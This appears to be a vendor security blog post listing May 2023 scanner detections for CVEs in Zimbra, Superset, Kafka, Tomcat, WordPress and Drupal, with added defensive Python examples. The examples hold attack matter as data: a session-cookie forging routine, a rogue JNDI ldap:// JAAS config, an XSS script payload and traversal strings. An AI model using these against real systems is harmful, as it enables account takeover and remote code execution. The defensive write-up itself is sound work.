May 2023 Web Application Vulnerabilities Released

Hitesh Kadu

The Qualys Web Application Scanning (WAS) team has released a crucial update to its security signatures, which now includes detection for vulnerabilities in several widely used software applications like Zimbra, Apache Superset, Apache Spark, WordPress, Atlassian Jira Server, Apache Kafka, Apache Tomcat and Drupal. If left unaddressed, these vulnerabilities could lead to serious security risks such as data breaches, unauthorized access, and other malicious activities. It is essential for organizations to perform a comprehensive security review and address any potential vulnerabilities to ensure the safety and security of their networks and systems.

QID      Title
150675   Zimbra Cross-Site Scripting (XSS) vulnerability (CVE-2022-27926)
150679   Apache Superset Insecure Default Configuration Vulnerability (CVE-2023-27524)
150680   Apache Spark Improper Privilege Management (CVE-2023-22946)
150681   WordPress Limit Login Attempts Plugin: Unauthenticated Stored XSS vulnerability (CVE-2023-1912)
150682   GeoWebCache Arbitrary Code Execution Vulnerability (CVE-2022-24846)
150683   Atlassian Jira Unauthorized Access to Resolutions
150684   WordPress Advanced Custom Fields Plugin: Cross-Site Scripting Vulnerability (CVE-2023-30777)
150685   Apache Kafka Connect Remote Code Execution (RCE) Vulnerability (CVE-2023-25194)
150686   WordPress Essential Addons for Elementor Plugin: Improper Authentication Vulnerability (CVE-2023-32243)
150687   Apache Tomcat FileUpload Denial Of Service (DoS) Vulnerability (CVE-2023-24998)
150688   Apache Tomcat Denial Of Service (DoS) Vulnerability (CVE-2023-28709)
154135   Drupal Core: Incorrect Authorization Vulnerability (CVE-2023-31250)
154136   Drupal Core: Multiple Vulnerabilities (CVE-2022-25277, CVE-2022-25278)
154137   Drupal Core: Information Disclosure Vulnerability (CVE-2022-25275)
154138   Drupal Core: Access Bypass Vulnerability (CVE-2022-25274)
154139   Drupal Core: Improper Input Validation Vulnerability (CVE-2022-25273)
154140   Drupal Core: Cross Site Scripting Vulnerability (CVE-2022-25276)
154141   WordPress Directory Traversal Vulnerability (CVE-2023-2745)

QID 150675: Zimbra Cross-Site Scripting (XSS) vulnerability (CVE-2022-27926)

CVE-ID: CVE-2022-27926
Severity: Level 4
CVSS 3.1: 6.1
CWE-ID: 79
Affected Versions: Zimbra Collaboration 9.0.0

Description:

Zimbra Collaboration, a comprehensive collaborative software suite, comprising an email server and web client, is susceptible to a reflected cross-site scripting (XSS) vulnerability. This vulnerability specifically affects the “/public/launchNewWindow.jsp” component of Zimbra Collaboration, enabling unauthenticated attackers to execute arbitrary web scripts or HTML by manipulating request parameters.

Successful exploitation lets an attacker execute arbitrary JavaScript in the context of the Zimbra web interface or read sensitive information held in the victim's browser. In practice the injected script carried in the crafted URL is used to fetch a second-stage payload, which then performs cross-site request forgery (CSRF) against the Zimbra web client to steal the user's credentials and CSRF tokens.

Zimbra users should upgrade to a patched release (Zimbra Collaboration 9.0.0 Patch 24 or later, or the current version). For further details refer to the official Zimbra release documentation.

QID 150679: Apache Superset Insecure Default Configuration Vulnerability (CVE-2023-27524)

CVE-ID: CVE-2023-27524
Severity: Level 3
CVSS 3.1: 9.8
CWE-ID: 1188
Affected Versions: Apache Superset versions up to and including 2.0.1

Description:

Apache Superset, an open-source data exploration and visualization platform, is a Flask application whose session cookies are signed with the SECRET_KEY from its configuration. Versions up to and including 2.0.1 ship with a default SECRET_KEY, and an installation that never replaced it as the installation instructions require is open to what the Apache advisory calls a session validation attack: because the key is public, an attacker can mint a session cookie that the server accepts, authenticate as an existing user (including an administrator) and reach resources they are not authorized to use. Installations whose administrators already changed the SECRET_KEY value are not affected.

Upgrade to Apache Superset 2.1.0 or later, which refuses to start while the default key is in place, and set a strong, randomly generated SECRET_KEY. If a production instance ever ran with the default key, treat every session issued under it as untrusted and rotate the key. For full details consult the official Apache Superset security advisory.
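The following is an added example, not Superset's own code, showing why a shared default SECRET_KEY destroys session integrity and how to check a configuration for it. The signing scheme below (HMAC-SHA256 over a JSON payload) is a simplified stand-in for Flask's signed-cookie sessions, not a byte-exact reproduction of Flask/itsdangerous, so its tokens would not be accepted by a real Superset. The placeholder key is the value shipped in superset/config.py before 2.1.0; the `_user_id` claim and "user id 1 is the administrator" are assumptions about a typical Flask-Login/Superset install.

```python
"""Added example: session forgery under a known SECRET_KEY, plus a config check."""
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# SECRET_KEY value shipped in superset/config.py before 2.1.0. Extend this set
# with any placeholder your own deployment templates use (assumption: the set
# is not exhaustive).
DEFAULT_SECRET_KEYS = {
    "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",
}


def secret_key_is_default(config: dict) -> bool:
    """True if SECRET_KEY is missing or still one of the known placeholders."""
    key = config.get("SECRET_KEY")
    return key is None or key in DEFAULT_SECRET_KEYS


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_session(secret_key: str, session: dict) -> str:
    """Serialise and sign a session dict (simplified signed-cookie model)."""
    payload = json.dumps(session, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(secret_key.encode(), payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(tag)}"


def verify_session(secret_key: str, cookie: str) -> Optional[dict]:
    """Return the session dict if the signature verifies, otherwise None."""
    try:
        payload_b64, tag_b64 = cookie.split(".", 1)
        payload = _unb64(payload_b64)
        tag = _unb64(tag_b64)
    except (ValueError, TypeError):
        return None
    expected = hmac.new(secret_key.encode(), payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(payload)


def forge_admin_cookie(known_key: str) -> str:
    """What an attacker who knows the key can do: claim to be user 1.
    Assumption: the logged-in user id lives under `_user_id` (Flask-Login)
    and user 1 is the administrator created at install time."""
    return sign_session(known_key, {"_user_id": "1", "_fresh": True})


def demo() -> dict:
    """Run the scenario end to end and report what happened."""
    default_key = next(iter(DEFAULT_SECRET_KEYS))
    forged = forge_admin_cookie(default_key)
    return {
        "default_key_flagged": secret_key_is_default({"SECRET_KEY": default_key}),
        "forged_accepted_by_default_key": verify_session(default_key, forged) is not None,
        "forged_rejected_by_random_key": verify_session(secrets.token_hex(32), forged) is None,
    }


if __name__ == "__main__":
    print(demo())
```

`secret_key_is_default` is the check to wire into deployment validation; the rest exists only to make the consequence concrete: any cookie is valid under the key that signed it, so a key everyone knows is no key at all.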

QID 150680: Apache Spark Improper Privilege Management (CVE-2023-22946)

CVE-ID: CVE-2023-22946
Severity: Level 5
CVSS 3.1: 9.9
CWE-ID: 269
Affected Versions: Apache Spark versions prior to 3.4.0

Description:

Apache Spark, a versatile engine for data engineering, data science, and machine learning, supports the use of ‘proxy-user’ functionality in applications submitted through spark-submit. This feature allows applications to run with limited privileges, executing code on behalf of the submitting user. However, a security vulnerability exists where malicious configuration-related classes included in the classpath can bypass this privilege limitation. This vulnerability impacts architectures relying on proxy-user, such as those utilizing Apache Livy for application management.

Exploiting this vulnerability allows an attacker to run code with the privileges of the submitting user rather than the restricted proxy user, defeating the isolation the feature is meant to provide. Upgrade to Apache Spark 3.4.0 or later. For full details refer to the SPARK-41958 advisory.

QID 150681: WordPress Limit Login Attempts Plugin: Unauthenticated Stored XSS vulnerability (CVE-2023-1912)

CVE-ID: CVE-2023-1912
Severity: Level 3
CVSS 3.1: 6.1
CWE-ID: 79
Affected Versions: Limit Login Attempts plugin prior to 1.7.2

Description:

Limit Login Attempts is a popular WordPress plugin that limits the number of login attempts allowed through the normal login form and through authentication cookies. When its "Site Connection" setting is "From behind a reverse proxy", the plugin takes the client IP address from a request header such as X-Forwarded-For. Affected versions neither validate that value as an IP address nor escape it before storing and displaying it, so an unauthenticated attacker can place a script payload in the header, have it stored as the "IP address" of a failed login, and have it execute when a privileged user later views the page where that address is displayed (stored cross-site scripting).

If successfully exploited, an attacker could execute arbitrary JavaScript code within the interface’s context or gain access to sensitive browser-based information. To mitigate this vulnerability, it is strongly recommended that customers upgrade to Limit Login Attempts 1.7.2 or a subsequent release.
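An added example, not the plugin's code, of the two controls whose absence causes this bug: trust X-Forwarded-For only when the request really arrived through one of your own proxies, accept a hop only if it parses as an IP address, and escape on output regardless. Function names, the proxy list and the sample headers are constructed for the example.

```python
"""Added example: safe client-IP resolution behind a reverse proxy."""
import html
import ipaddress
from typing import Iterable, Mapping, Optional


def _is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def client_ip(headers: Mapping[str, str], remote_addr: str,
              trusted_proxies: Iterable[str]) -> Optional[str]:
    """Return the client address as a validated IP string, or None.

    X-Forwarded-For is consulted only when the TCP peer is one of our own
    proxies; otherwise a client talking to us directly could spoof it. Every
    hop must parse as an IP address, which is what guarantees that a script
    payload never gets stored or rendered as an "address"."""
    if not _is_ip(remote_addr):
        return None
    trusted = {ipaddress.ip_network(p, strict=False) for p in trusted_proxies}
    peer = ipaddress.ip_address(remote_addr)
    if not any(peer in net for net in trusted):
        return str(peer)  # direct connection: ignore any forwarded header
    xff = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    # Walk right to left: skip our own proxies, the first untrusted hop is the client.
    for hop in reversed(hops):
        if not _is_ip(hop):
            return None  # malformed or hostile header: refuse rather than guess
        addr = ipaddress.ip_address(hop)
        if not any(addr in net for net in trusted):
            return str(addr)
    return str(peer)  # header contained only our proxies


def render_lockout_row(ip_field: str) -> str:
    """Escape on output even for values that were validated on input,
    so a stored value can never become markup in the admin page."""
    return f"<td>{html.escape(ip_field, quote=True)}</td>"


def demo() -> dict:
    """Constructed requests: one honest, one carrying a payload, one spoofed
    directly without passing through the proxy."""
    proxies = ["10.0.0.0/8"]
    honest = {"X-Forwarded-For": "203.0.113.7, 10.0.0.5"}
    hostile = {"X-Forwarded-For": "<script>alert(1)</script>, 10.0.0.5"}
    return {
        "honest": client_ip(honest, "10.0.0.5", proxies),
        "hostile": client_ip(hostile, "10.0.0.5", proxies),
        "spoof_direct": client_ip(honest, "198.51.100.9", proxies),
        "escaped": render_lockout_row("<script>alert(1)</script>"),
    }


if __name__ == "__main__":
    print(demo())
```

Returning None for a malformed header is a deliberate choice: an address that cannot be parsed should be logged as an anomaly, not stored, since a lockout table keyed on attacker-controlled strings is also an easy way to lock out legitimate users.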

QID 150682: GeoWebCache Arbitrary Code Execution Vulnerability (CVE-2022-24846)

CVE-ID: CVE-2022-24846
Severity: Level 4
CVSS 3.1: 7.2
CWE-ID: 20, 400, 502
Affected Versions: GeoWebCache versions prior to 1.19.3
                   GeoWebCache versions 1.20.0 prior to 1.20.2

Description:

GeoWebCache is a Java-based tile caching server widely used for caching map tiles from various sources like OGC Web Map Service (WMS). However, certain versions of GeoWebCache are affected by a critical vulnerability related to the disk quota mechanism. This flaw allows for an unchecked JNDI (Java Naming and Directory Interface) lookup, which can be exploited to trigger class deserialization and ultimately lead to Arbitrary Code Execution.

While GeoWebCache handles JNDI strings through a local configuration file, GeoServer, which utilizes GeoWebCache, provides a user interface that enables remote access and allows these lookups. It’s important to note that this interface requires administrative-level login credentials. Exploiting this vulnerability could grant remote attackers the ability to execute arbitrary commands on the targeted system.

To safeguard against this vulnerability, it is strongly recommended that customers promptly upgrade to the latest version of GeoWebCache. This update will address the security flaw and ensure the integrity and safety of your caching server. For additional details and guidance, please refer to the GitHub Security Advisory associated with this vulnerability.

QID 150683: Atlassian Jira Unauthorized Access to Resolutions

CVE-ID: NA
Severity: Level 2
CVSS 3.1: 5.3
CWE-ID: 284
Affected Versions: Atlassian Jira Server

Description:

Jira, Atlassian's issue-tracking and project-management product, exposes the /rest/api/2/resolution REST endpoint without requiring authentication on affected Jira Server instances. A remote, unauthenticated user can therefore enumerate the issue resolutions configured on the instance (their names and descriptions). This is configuration metadata rather than issue content, which is why the severity is low, but it reveals details of the instance's setup that should not be available anonymously and helps an attacker profile the server.

To mitigate, block unauthenticated access to the URL */rest/api/2/resolution at the network level (for example at a reverse proxy or web application firewall in front of Jira) so that only authenticated users can reach it.

QID 150684: WordPress Advanced Custom Fields Plugin: Cross-Site Scripting Vulnerability (CVE-2023-30777)

CVE-ID: CVE-2023-30777
Severity: Level 4
CVSS 3.1: 6.1
CWE-ID: 79
Affected Versions: Advanced Custom Fields plugin versions 6.1.5 and below

Description:

Advanced Custom Fields (ACF) is a highly popular and robust WordPress plugin that empowers users to create custom fields, manage metadata, and manipulate data, resulting in more dynamic and customizable websites.

A reflected cross-site scripting (XSS) vulnerability was discovered in the plugin, caused by insufficient input sanitization and output escaping of the 'post_status' parameter. The attacker does not need an account on the site: the malicious script travels in a crafted link and executes in the browser of a user who follows it, in the context of that user's session. A successful attack lets the attacker run arbitrary JavaScript within the interface or read sensitive information held by the victim's browser.

To safeguard your WordPress site from potential exploits, it is strongly advised to upgrade to Advanced Custom Fields version 6.1.6 or a subsequent release. This update addresses the vulnerability and helps mitigate the associated risks.

QID 150685: Apache Kafka Connect Remote Code Execution (RCE) Vulnerability (CVE-2023-25194)

CVE-ID: CVE-2023-25194
Severity: Level 4
CVSS 3.1: 8.8
CWE-ID: 502
Affected Versions: Apache Kafka Connect from version 2.3.0 to 3.3.2

Description:

Apache Kafka is a distributed event store and stream-processing platform. Kafka Connect, its framework for moving data between Kafka and external systems, is affected by a deserialization vulnerability that leads to remote code execution. Exploitation requires access to a Kafka Connect worker and the ability to create or modify connectors whose configuration sets an arbitrary Kafka client SASL JAAS configuration (sasl.jaas.config) together with a SASL-based security protocol. The client-override mechanism that makes this possible has existed since Apache Kafka 2.3.0; since 3.0.0 the out-of-the-box connector client override policy lets connector creators supply such properties directly, whereas older Connect clusters are only exposed if they were reconfigured with a permissive override policy. A successful attack lets the attacker execute arbitrary code on the worker or deny service to it.

Upgrade to Apache Kafka 3.4.0 or later, which adds the org.apache.kafka.disallowed.login.modules system property and disables com.sun.security.auth.module.JndiLoginModule by default. Independently of the upgrade, review connector configurations and allow only trusted JAAS settings, check connector dependencies for vulnerable versions (upgrade or remove affected connectors), and consider a custom connector client config override policy that prevents sasl.jaas.config and related client properties from being set in connector configs. For full details refer to the official Apache Kafka advisory.
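The Kafka advisory's advice is to validate connector configurations and allow only trusted JAAS settings. The following is an added example of such an audit, not Apache Kafka code: it walks a dictionary of connector name to configuration (the shape you would assemble from the Connect REST API), flags any `sasl.jaas.config` property, at any override prefix, that names a disallowed login module or carries a JNDI-style URL, and reports them. The connector configurations are constructed sample data and the regexes and deny list are this example's own choices.

```python
"""Added example: audit Kafka Connect connector configs for risky JAAS overrides."""
import re
from typing import Dict, List

# Kafka 3.4.0 blocks this module by default via
# -Dorg.apache.kafka.disallowed.login.modules; older clusters must check themselves.
DISALLOWED_LOGIN_MODULES = {"com.sun.security.auth.module.JndiLoginModule"}

# A JAAS entry looks like: <module class> <flag> key="value" ...;
_MODULE_RE = re.compile(r"([A-Za-z_][\w$.]*)\s+(?:required|requisite|sufficient|optional)\b")
# URL schemes that a JNDI lookup would dereference.
_JNDI_URL_RE = re.compile(r"(?:ldap|ldaps|rmi|dns|iiop)://[^\s\"']+")

# Constructed sample, not taken from a real cluster.
SAMPLE_CONNECTORS: Dict[str, Dict[str, str]] = {
    "orders-sink": {
        "connector.class": "io.example.SinkConnector",
        "topics": "orders",
        "producer.override.sasl.jaas.config":
            'org.apache.kafka.common.security.plain.PlainLoginModule required '
            'username="svc" password="x";',
    },
    "rogue-source": {
        "connector.class": "io.example.SourceConnector",
        "consumer.override.security.protocol": "SASL_PLAINTEXT",
        "consumer.override.sasl.mechanism": "PLAIN",
        "consumer.override.sasl.jaas.config":
            'com.sun.security.auth.module.JndiLoginModule required '
            'user.provider.url="ldap://203.0.113.10:1389/a" useFirstPass="true";',
    },
}


def jaas_modules(jaas_value: str) -> List[str]:
    """Extract the login-module class names from a JAAS configuration string."""
    return _MODULE_RE.findall(jaas_value)


def audit_connectors(connectors: Dict[str, Dict[str, str]]) -> List[dict]:
    """Return one finding per sasl.jaas.config value that uses a disallowed
    module or points at a JNDI URL. Matching on the key suffix catches the
    producer./consumer./admin. override prefixes and any connector-specific
    nested client prefix alike."""
    findings = []
    for name, config in connectors.items():
        for key, value in config.items():
            if not key.endswith("sasl.jaas.config"):
                continue
            text = str(value)
            bad_modules = [m for m in jaas_modules(text) if m in DISALLOWED_LOGIN_MODULES]
            urls = _JNDI_URL_RE.findall(text)
            if bad_modules or urls:
                findings.append({"connector": name, "key": key,
                                 "modules": bad_modules, "urls": urls})
    return findings


if __name__ == "__main__":
    for f in audit_connectors(SAMPLE_CONNECTORS):
        print(f"{f['connector']}: {f['key']} -> modules={f['modules']} urls={f['urls']}")
```

A clean result from this audit is not a substitute for the upgrade: it only covers configurations present at the time of the scan, while the override policy and the 3.4.0 deny list prevent the property from being accepted in the first place.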

QID 150686: WordPress Essential Addons for Elementor Plugin: Improper Authentication Vulnerability (CVE-2023-32243)

CVE-ID: CVE-2023-32243
Severity: Level 5
CVSS 3.1: 9.8
CWE-ID: 287
Affected Versions: Essential Addons for Elementor Plugin from 5.4.0 to 5.7.1

Description:

Essential Addons for Elementor extends the Elementor page builder with additional widgets and page elements. A critical vulnerability in the plugin allows unauthenticated privilege escalation: its password-reset handling does not verify that a valid reset key belongs to the account being reset, so an attacker with no account on the site can reset the password of any user, including administrators, and log in as that user. This hands the attacker full control of the website.

To mitigate this vulnerability and safeguard your website from potential unauthorized access and compromise, it is strongly recommended to upgrade to Essential Addons for Elementor version 5.7.2  or any subsequent release.

QID 150687: Apache Tomcat FileUpload Denial Of Service (DoS) Vulnerability (CVE-2023-24998)

CVE-ID: CVE-2023-24998
Severity: Level 3
CVSS 3.1: 7.5
CWE-ID: 770
Affected Versions: Apache Tomcat from version 8.5.0 to 8.5.84
                   Apache Tomcat from version 9.0.0-M1 to 9.0.70
                   Apache Tomcat from version 10.1.0-M1 to 10.1.4
                   Apache Tomcat version 11.0.0-M1

Description:

Apache Tomcat ships a modified copy of Apache Commons FileUpload to implement the file upload support required by the Jakarta Servlet specification, so the Commons FileUpload vulnerability CVE-2023-24998 also affected Tomcat. The flaw was the absence of any limit on the number of parts processed in a multipart request, which let an attacker tie up the server with a single malicious upload or a series of them (denial of service). Tomcat's fix, first released in 8.5.85, 9.0.71, 10.1.5 and 11.0.0-M2, counts multipart parts against the connector's existing maxParameterCount limit.

Because that first fix was later found incomplete (CVE-2023-28709, below), upgrade to a release that contains the complete fix: Apache Tomcat 8.5.88, 9.0.74, 10.1.8 or 11.0.0-M5, or later.

QID 150688: Apache Tomcat Denial Of Service (DoS) Vulnerability (CVE-2023-28709)

CVE-ID: CVE-2023-28709
Severity: Level 3
CVSS 3.1: 7.5
CWE-ID: 193
Affected Versions: Apache Tomcat from version 8.5.85 to 8.5.87
                   Apache Tomcat from version 9.0.71 to 9.0.73
                   Apache Tomcat from version 10.1.5 to 10.1.7
                   Apache Tomcat from version 11.0.0-M2 to 11.0.0-M4

Description:

The fix for CVE-2023-24998 in Tomcat 8.5.85, 9.0.71, 10.1.5 and 11.0.0-M2 was incomplete. With non-default HTTP connector settings that allow the maxParameterCount limit to be reached through query string parameters alone, a request carrying exactly maxParameterCount parameters in its query string bypassed the limit on uploaded request parts, leaving the server open to the same denial-of-service condition.

An attacker can therefore still trigger a DoS with a malicious upload or a series of uploads. Upgrade to Apache Tomcat 8.5.88, 9.0.74, 10.1.8 or 11.0.0-M5, or later. For full details consult the official Apache Tomcat security pages.
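The two Tomcat entries above describe a shared budget: maxParameterCount covers both query string parameters and multipart parts, and the budget left for parts is whatever the query string did not consume. The following added example is a model of that boundary condition, not Tomcat source: it shows how a remaining budget of exactly zero can be mistaken for "no limit" (the off-by-one class the second advisory is filed under) and how the corrected check differs. The numbers and the sentinel convention are illustrative.

```python
"""Added example: modelling a shared parameter/part budget and its off-by-one."""
from typing import List

UNLIMITED = -1  # the explicit "no limit" sentinel for this kind of setting


def parts_allowed_buggy(max_parameter_count: int, query_params: int, parts: int) -> bool:
    """Limit check with the flaw modelled: zero remaining looks like 'unlimited'."""
    if max_parameter_count == UNLIMITED:
        return True
    if query_params > max_parameter_count:
        return False  # the query string alone already exceeds the limit
    remaining = max_parameter_count - query_params
    # Bug: `remaining > 0` silently treats a budget of exactly 0 as no budget at all.
    if remaining > 0 and parts > remaining:
        return False
    return True


def parts_allowed_fixed(max_parameter_count: int, query_params: int, parts: int) -> bool:
    """Corrected check: only the explicit sentinel lifts the cap."""
    if max_parameter_count == UNLIMITED:
        return True
    if query_params > max_parameter_count:
        return False
    remaining = max_parameter_count - query_params
    return parts <= remaining  # zero remaining means zero parts allowed


def bypass_cases(max_parameter_count: int, parts: int) -> List[int]:
    """Query-string parameter counts for which the buggy check admits `parts`
    multipart parts while the fixed check rejects them."""
    return [q for q in range(0, max_parameter_count + 1)
            if parts_allowed_buggy(max_parameter_count, q, parts)
            and not parts_allowed_fixed(max_parameter_count, q, parts)]


if __name__ == "__main__":
    # With a limit of 1000 the only bypass is a query string of exactly 1000 parameters.
    print(bypass_cases(1000, parts=100_000))
```

The lesson generalises beyond Tomcat: whenever a limit is passed on as "what is left", check the remaining value against the sentinel you actually use for "unlimited", never against zero.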

QID 154135: Drupal Core: Incorrect Authorization Vulnerability (CVE-2023-31250)

CVE-ID: CVE-2023-31250
Severity: Level 3
CVSS 3.1: 6.5
CWE-ID: 863
Affected Versions: Drupal from 7.0 to 7.95
                   Drupal from 9.4 to 9.4.13
                   Drupal from 9.5 to 9.5.7
                   Drupal from 10.0 to 10.0.7

Description:

In certain situations, the file download functionality in Drupal fails to adequately sanitize file paths. As a consequence, users may exploit this vulnerability to gain access to private files that are intended to be restricted. This security flaw allows unauthorized individuals to potentially view confidential information that they should not have access to.

To address this security issue and safeguard your Drupal installation, it is strongly recommended that you promptly install the latest available version. For comprehensive details and further guidance regarding this vulnerability, please refer to the official Drupal security advisory SA-CORE-2023-005.

QID 154136: Drupal Core: Multiple Vulnerabilities (CVE-2022-25277, CVE-2022-25278)

CVE-ID: CVE-2022-25277, CVE-2022-25278
Severity: Level 4
CVSS 3.1: 7.2
CWE-ID: 863
Affected Versions: Drupal from 8.0.0 to 9.3.18
                   Drupal from 9.4.0 to 9.4.2

Description:

Drupal, a PHP-based content management framework distributed under the GNU General Public License, has been identified with multiple vulnerabilities:

  1. CVE-2022-25277 (SA-CORE-2022-014): Drupal core sanitizes uploaded filenames with dangerous extensions and strips leading and trailing dots from filenames so that server configuration files cannot be uploaded, but the two protections did not work correctly together. On a site configured to allow uploads with an htaccess extension, such filenames were not properly sanitized, which could bypass the protection provided by Drupal core's default .htaccess files and lead to remote code execution on Apache web servers.
  2. CVE-2022-25278 (SA-CORE-2022-013): Under certain circumstances the Drupal core form API evaluates form element access incorrectly, which may let a user alter data they should not have access to. No forms provided by Drupal core are known to be vulnerable, but forms added by contributed or custom modules or themes may be affected.

Exploiting these vulnerabilities could lead to security breaches, compromising the integrity, availability, and confidentiality of affected systems.

To mitigate these risks, it is strongly recommended that customers promptly update to the latest available version of Drupal. For detailed information and further guidance on these vulnerabilities, please refer to the Drupal security advisories SA-CORE-2022-014 and SA-CORE-2022-013.

QID 154137: Drupal Core: Information Disclosure Vulnerability (CVE-2022-25275)

CVE-ID: CVE-2022-25275
Severity: Level 4
CVSS 3.1: 7.5
CWE-ID: 200
Affected Versions: Drupal from 7.0 to 7.90
                   Drupal from 8.0.0 to 9.3.18
                   Drupal from 9.4.0 to 9.4.2

Description:

Drupal, an open-source content management framework written in PHP and distributed under the GNU General Public License, has been identified with a security vulnerability related to the Image module. Under specific circumstances, the Image module fails to adequately verify access to image files that are not stored in the standard public files directory. This vulnerability manifests when generating derivative images using the image styles system.

Exploiting this vulnerability could result in an Information Disclosure vulnerability, enabling attackers to gain access to sensitive information. This information disclosure could potentially be leveraged to carry out further attacks.

To mitigate these risks, it is strongly recommended that customers promptly update their Drupal installations to the latest available version. For comprehensive details and additional guidance on this vulnerability, please refer to the Drupal security advisory SA-CORE-2022-012.

QID 154138: Drupal Core: Access Bypass Vulnerability (CVE-2022-25274)

CVE-ID: CVE-2022-25274
Severity: Level 3
CVSS 3.1: 5.4
CWE-ID: 284
Affected Versions: Drupal from 9.3.0 to 9.3.11

Description:

Drupal, a PHP-based open-source content management framework distributed under the GNU General Public License, has identified a security vulnerability related to its entity access API for entity revisions, specifically in Drupal 9.3. While implementing the generic entity access API, Drupal 9.3 did not fully integrate it with existing permissions. As a result, there is a potential for access bypass for users who have general access to revisions of content but lack access to individual node and media items. 

It is important to note that this vulnerability only affects websites utilizing Drupal’s revision system.

Exploiting this vulnerability enables users to bypass access restrictions, allowing them to gain unauthorized access to specific content items despite lacking the necessary individual item permissions.

To mitigate these risks, it is strongly recommended that Drupal site owners promptly upgrade to the latest available version. For comprehensive details and further guidance on this specific vulnerability, please refer to the Drupal security advisory SA-CORE-2022-009.

QID 154139: Drupal Core: Improper Input Validation Vulnerability (CVE-2022-25273)

CVE-ID: CVE-2022-25273
Severity: Level 4
CVSS 3.1: 7.5
CWE-ID: 20
Affected Versions: Drupal from 8.0.0 to 9.2.18
                   Drupal from 9.3.0 to 9.3.11

Description:

Drupal is an open-source content management framework written in PHP and distributed under the GNU General Public License. A security vulnerability has been identified in Drupal core’s form API, specifically affecting certain contributed or custom modules’ forms.

The vulnerability arises from improper input validation, potentially enabling an attacker to inject disallowed values or overwrite data within affected forms. While these vulnerable forms are not widespread, in specific scenarios, an attacker could manipulate critical or sensitive data, leading to potential compromises.

To mitigate the risks associated with this vulnerability, customers are strongly advised to promptly upgrade to the most recent version of Drupal. For more detailed information and comprehensive guidance on this specific vulnerability, please refer to the Drupal security advisory SA-CORE-2022-008.

QID 154140: Drupal Core: Cross Site Scripting Vulnerability (CVE-2022-25276)

CVE-ID: CVE-2022-25276
Severity: Level 3
CVSS 3.1: 6.1
CWE-ID: 79
Affected Versions: Drupal from 9.3.0 to 9.3.18
                   Drupal from 9.4.0 to 9.4.2

Description:

Drupal is a widely used, open-source content management framework written in PHP and distributed under the GNU General Public License. An important security vulnerability has been identified in Drupal’s Media module related to the oEmbed iframe route.

This vulnerability stems from inadequate validation of the iframe domain setting within the Media module, potentially enabling the display of embedded content within the context of the primary domain. In certain circumstances, this could result in cross-site scripting (XSS) attacks, leakage of cookies, or other vulnerabilities. Exploiting this vulnerability successfully would allow attackers to inject malicious HTML or JavaScript code through XSS, facilitating further attacks and potentially compromising sensitive information.

To safeguard your Drupal-based website and mitigate the risks associated with this vulnerability, it is crucial to promptly install the latest version of Drupal. For comprehensive details and guidance specific to this vulnerability, we recommend consulting the Drupal security advisory SA-CORE-2022-015.

QID 154141: WordPress Directory Traversal Vulnerability (CVE-2023-2745)

CVE-ID: CVE-2023-2745
Severity: Level 3
CVSS 3.1: 7.2
CWE-ID: 22
Affected Versions: WordPress versions up to and including 6.2 (fixed in 6.2.1 and in the corresponding security releases of older supported branches)

Description:

WordPress is a widely used, open-source content management system written in PHP and commonly paired with a MySQL or MariaDB database. WordPress core is affected by a directory traversal vulnerability in the handling of the 'wp_lang' parameter, which selects the translation (locale) file to load.

The flaw lets an unauthenticated attacker choose which translation file WordPress loads on the affected site, including files outside the languages directory. On its own that only loads files the attacker can name; if the attacker can first place a crafted translation file on the server, for example through an upload form, loading it through this flaw lets them inject content into pages and carry out cross-site scripting (XSS) attacks.

Upgrade to WordPress 6.2.1 or later (or the corresponding security release of the branch you run).
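An added example, not WordPress code, of the control that prevents this class of bug: a locale taken from a request parameter must be validated against a strict pattern and the resulting path canonicalised and confined to the languages directory before anything is loaded. The directory layout, file names and the unsafe comparison function are constructed for the example.

```python
"""Added example: confining a user-chosen locale to the translations directory."""
import re
import tempfile
from pathlib import Path
from typing import Optional

# Locale identifiers are short and alphanumeric (plus '_' and '-'); no dots, no slashes.
LOCALE_RE = re.compile(r"^[A-Za-z0-9_-]{2,20}$")


def translation_file(languages_dir: Path, locale: str) -> Optional[Path]:
    """Return languages_dir/<locale>.mo only if `locale` is well-formed and the
    canonical path stays inside languages_dir; otherwise None."""
    if not LOCALE_RE.fullmatch(locale):
        return None
    base = languages_dir.resolve()
    candidate = (base / f"{locale}.mo").resolve()
    if candidate.parent != base:  # defence in depth: also blocks symlink escapes
        return None
    return candidate if candidate.is_file() else None


def translation_file_unsafe(languages_dir: Path, locale: str) -> Path:
    """The pattern to avoid: path concatenation with no validation."""
    return languages_dir / f"{locale}.mo"


def demo() -> dict:
    """Build a throwaway directory tree (constructed sample data) and compare
    the safe and unsafe resolvers on a traversal payload."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        langs = root / "languages"
        langs.mkdir()
        (langs / "de_DE.mo").write_bytes(b"\xde\x12\x04\x95")  # MO magic only
        uploads = root / "uploads"
        uploads.mkdir()
        planted = uploads / "evil.mo"
        planted.write_bytes(b"\xde\x12\x04\x95")
        traversal = "../uploads/evil"  # what an attacker would pass as the locale
        return {
            "valid_locale_loads": translation_file(langs, "de_DE") is not None,
            "traversal_blocked": translation_file(langs, traversal) is None,
            "unsafe_resolves_outside":
                translation_file_unsafe(langs, traversal).resolve() == planted.resolve(),
            "absolute_blocked": translation_file(langs, "/etc/passwd") is None,
        }


if __name__ == "__main__":
    print(demo())
```

Two independent checks are used on purpose: the allow-list regex rejects the input before any filesystem call, and the canonical-path comparison catches anything the pattern might miss, such as a locale name that is itself a symlink pointing elsewhere.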
